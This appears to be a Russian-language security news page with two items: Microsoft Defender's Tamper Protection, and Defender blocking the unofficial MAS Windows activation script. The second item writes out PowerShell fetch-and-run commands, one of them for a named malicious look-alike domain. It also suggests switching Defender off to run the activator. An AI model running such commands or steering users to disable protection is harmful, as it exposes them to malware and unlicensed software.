Защитник Windows теперь не позволит вредоносам менять свои настройки

Защитник Windows теперь не позволит вредоносам менять свои настройки

Защитник Windows теперь не позволит вредоносам менять свои настройки

Microsoft добавила дополнительный слой защиты для своего продукта Microsoft Defender Advanced Threat Protection (ATP), который призван защитить пользователей от известной тактики отключения антивируса на зараженных компьютерах, к которой прибегают киберпреступники.

Новую функцию можно активировать в приложении Windows Security — для этого просто надо переключить тумблер у пункта «Tamper Protection».

Эта новая возможность не позволит вредоносным программам изменить основные внутренние настройки, например, защиту в режиме реального времени. В цифровом пространстве было замечено множество зловредов, которые использовали тактику отключения антивируса, чтобы избежать детектирования.

Среди таких программ можно выделить DoubleAgent, который использует функцию разработчиков в Windows для отключения продуктов таких крупных антивирусных компаний, как Avast, AVG, Avira, Bitdefender, Trend Micro, Comodo, ESET, F-Secure, Kaspersky, Malwarebytes, McAfee, Panda и Norton.

Помимо этого, новая настройка также не позволит злонамеренным программам отключить функцию детектирования вредоносов через облако, которая помогает обнаружить 0-day угрозы.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru